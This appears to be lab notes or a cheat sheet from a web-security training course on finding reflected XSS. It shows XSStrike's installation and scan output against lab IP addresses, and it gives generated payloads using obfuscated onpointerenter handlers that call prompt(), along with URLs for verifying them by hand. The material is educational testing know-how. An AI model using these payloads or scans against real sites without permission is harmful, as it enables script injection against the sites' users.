XSS TESTING (HYBRID)

INSTALL AUTOMATED XSS DISCOVERY TOOL

#clone a reviewed release/commit rather than running whatever is on the default branch (the tool executes against live targets)
root@oco:~$ git clone https://github.com/s0md3v/XSStrike.git
root@oco:~$ cd XSStrike
#install into a virtualenv instead of the system (root) site-packages
root@oco:~$ python3 -m venv venv && . venv/bin/activate
root@oco:~$ pip install -r requirements.txt
#only execute permission is needed; 777 makes the script world-writable, so any local user could replace it with their own code
root@oco:~$ chmod u+x xsstrike.py

PERFORM HYBRID DISCOVERY (MAIN PAGE)

#perform code review
root@oco:~$ BROWSER > {targetSite:port} > CTRL + U
 * review the HTML source: note every form field (name attributes), hidden inputs and URL parameters, and which of them are reflected back into the page
 * also review any linked .js files for places where user-controlled input (URL, hash, form values) is written into the DOM

#verify by entering data in the form fields
root@oco:~$ BROWSER > {targetSite:port} > F12
 input fields: fill every field with a unique, easily searchable string (a canary) so reflections are obvious in the response
 * copy the full URL after submitting to identify GET request parameters
    - http://94.237.60.32:30702/index.php?fullname=bughunter&username=debugger&password=password&email=email%40null.com
       - fullname, username, password, email
       - note: the form submits the password as a GET parameter, which is a finding in itself (credentials end up in browser history, proxy/server logs and Referer headers)

#perform automated discovery
root@oco:~$ ./xsstrike.py -u "http://94.237.60.32:30702/index.php?fullname=bughunter&username=bugger&password=password&email=email%40null.com"
 XSStrike v3.1.5
  [~] Checking for DOM vulnerabilities 
  [+] WAF Status: Offline 
  [!] Testing parameter: fullname 
  [-] No reflection found 
  [!] Testing parameter: username 
  [-] No reflection found 
  [!] Testing parameter: password 
  [-] No reflection found 
  [!] Testing parameter: email 
  [!] Reflections found: 1 
  [~] Analysing reflections 
  [~] Generating payloads 
  [!] Payloads generated: 3072 
  ------------------------------------------------------------
  [+] Payload: <hTML%0donpoiNtEreNtER+=+(prompt)``// 
  [!] Efficiency: 100 
  [!] Confidence: 10 
  [?] Would you like to continue scanning? [y/N]
  
#manually verify the identified parameter (automated "Confidence" scores are a hint, not proof)
root@oco:~$ BROWSER > http://94.237.60.32:30702/index.php?fullname=bughunter&username=bugger&password=password&email=<hTML%0donpoiNtEreNtER+=+(prompt)``//
 * the payload injects an onpointerenter handler, so the prompt only appears when the mouse pointer enters the injected element; move the pointer over the page rather than expecting it on load (the `+` characters are decoded as spaces in the query string)

PERFORM HYBRID DISCOVERY (SUBDIRECTORY)

#perform code review
root@oco:~$ BROWSER > {targetSite:port}/{subdirectory} > CTRL + U
 * review the HTML source and identify parameters
 * also review the .js file

#verify by entering data in the form fields
root@oco:~$ BROWSER > {targetSite:port}/{subdirectory} > F12
 input fields: fill in data
 * copy the full URL to identify GET request parameters
    - http://10.129.171.142/phishing/index.php?url=ytrst
 
#perform automated discovery (ACADEMY-XSS-ASMT must resolve to the target, e.g. via an /etc/hosts entry for 10.129.171.142, otherwise use the IP as in the previous step)
root@oco:~$ ./xsstrike.py -u "http://ACADEMY-XSS-ASMT/phishing/index.php?url=ytrst"
 XSStrike v3.1.5
  [~] Checking for DOM vulnerabilities 
  [+] WAF Status: Offline 
  [!] Testing parameter: url 
  [!] Reflections found: 1 
  [~] Analysing reflections 
  [~] Generating payloads 
  [!] Payloads generated: 3096 
  ------------------------------------------------------------
  [+] Payload: '><D3v%0aONpOINteReNtER%09=%09(prompt)``%0dx>v3dm0s 
  [!] Efficiency: 100 
  [!] Confidence: 9 
  [?] Would you like to continue scanning? [y/N] N
  
#manually verify the identified parameter
root@oco:~$ BROWSER > http://10.129.171.142/phishing/index.php?url='><D3v%0aONpOINteReNtER%09=%09(prompt)``%0dx>v3dm0s
 * the trailing canary string (v3dm0s) is rendered in the page, which confirms the injected element was parsed as HTML; moving the pointer over it should trigger the prompt via the onpointerenter handler
